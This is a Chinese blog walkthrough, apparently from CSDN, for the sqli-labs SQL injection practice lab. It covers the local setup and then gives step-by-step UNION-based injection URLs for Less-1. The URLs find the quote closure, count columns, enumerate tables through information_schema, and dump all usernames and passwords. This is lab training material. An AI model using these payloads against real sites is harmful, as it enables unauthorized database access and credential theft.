sqli-labs靶场通关攻略

已于 2024-08-14 20:33:28 修改
阅读量271 收藏 3
点赞数 10
文章标签: 数据库 web安全
于 2024-08-14 18:31:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A2893992091/article/details/141195628
版权

一、靶场安装

1.在小皮面板中启动WAMP框架

2.修改PHP版本为5.4.45。

3.打开网站根目录。

4.将靶场的文件解压后,全部粘贴在根目录下

5.修改网站根目录下的“sql-connections/db-creds.inc”的内容,以记事本打开,输入你的MySQL的密码。

6.输入本机回环地址127.0.0.1,点击SQLi-LABS Page-1(Basic Challenges)安装靶场

6.安装完成后,如图所示。

二、靶场练习

第一关
1.判断闭合方式

报错说明注入参数后任有语句

闭合如下

127.0.01/Less-1/?id=1' --+

2.判断列数

依次输入以下网址进行判断

127.0.01/Less-1/?id=1' order by 1 --+

127.0.01/Less-1/?id=1' order by 2 --+

127.0.01/Less-1/?id=1' order by 3 --+

127.0.01/Less-1/?id=1' order by 4 --+

测试出有三列。

3.联合查询各列

127.0.0.1/Less-1/?id=1‘union select 1,2,3 --+

4.查找回显点

127.0.0.1/Less-1/?id=-1‘union select 1,2,3 --+

5.联合查询了数据库名和用户

127.0.0.1/Less-1/?id=-1'union select 1,database(),user()--+

6.联合查询网站数据库中所有表
127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

7.联合查询 查出users表里面的所有列

127.0.0.1/Less-1/?id=-1
' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

 8.查询表中所有的数据

127.0.0.1/Less-1/?id=-1
' union select 1,2,group_concat(id,username,password) from users --+

通关!完结撒花!!!

无敌的俊哥
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2021
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 1422
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1081
Sqli-labs-master靶场1-20通关教程
sqli-labs SQL注入靶场通关手册
2302_78345978的博客
05-18 1679
在name=后加上'and (length(database())=8)--+发送到重映器,进行修改:首先在User-Agent后加 ’ 查看报错信息。因为cookie需要登录才能验证,所以放行,后刷新页面,抓取cookie。进行HTTP User-Agent 注入,选择less-18。进行post传参无回显的布尔类型盲注,选择less-15。(输入账号密码,提交后,在burp上查看截获的数据)先猜数据库名字长度,>=8时不报错,>=9时报错。进行post传参的字符型注入,选择less-13。
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1402
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3630
sqli-labs靶场通关(1-10)
Sqli-labs-master靶场1-23关通关详细教程(基础篇)
一纸荒芜的博客
06-23 5224
Sqli-labs-master靶场1-23关通关详细教程(基础篇)
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 5101
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
seatunnel2.3.3在centos7上安装
鑫哥
08-09 863
安装前需要准备点环境,因为seatunnel是基于java开发的,因此需要先安装java,我这里使用的java1.8,可以网上搜索下java安装教程,记得配置JAVA_HOME环境变量。在安装的过程中需要用到mysql命令,因此也需要安装下MySQL环境,这里也不具体讲解了,在网上搜索安装就行。接下来就是正式安装seatunnel了,
JDBC详细使用
m0_73627305的博客
08-09 508
​ JDBC是一种标准,一种规则,主要作用是使用java语言操作数据库的​ JDBC这个标准中有很多的接口,接口中有很多方法。
LangChain与Elasticsearch向量数据库的完美结合
最新发布
python1234_的博客
08-13 1174
在过去的一年中,生成式 AI (Generative AI) 领域取得了显著的进展。许多新的服务和工具应运而生。其中,LangChain 已成为构建大语言模型 (LLM) 应用程序(例如检索增强生成 (RAG) 系统)最受欢迎的框架之一。该框架极大地简化了原型开发,并使开发者能够轻松实验不同的模型和检索系统。最近Elasticsearch将其集成从社区包升级为官方的 LangChain 合作伙伴包。这一升级使得在 LangChain 应用程序中引入 Elasticsearch 功能变得更加简便。
11、MySQL-SQL优化
nibabaoo的博客
08-12 142
1、Using filesort:通过表的索引或全表扫描,读取满足条件的数据行,然后在排序缓冲区sort bufer中完成排序操作,所有不是通过索引直接返回排序结果的排序都叫 FileSort 排序。一个常见又非常头疼的问题就是 limit 2000000,10,此时需要MySQL排序前2000010记录,仅仅返回2000000-2000010的记录,其他记录丢弃,查询排序的代价非常大。:表锁适用于操作频繁但对并发要求较低的场景,或者当表上的操作是大范围的(例如,清空整个表)时。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值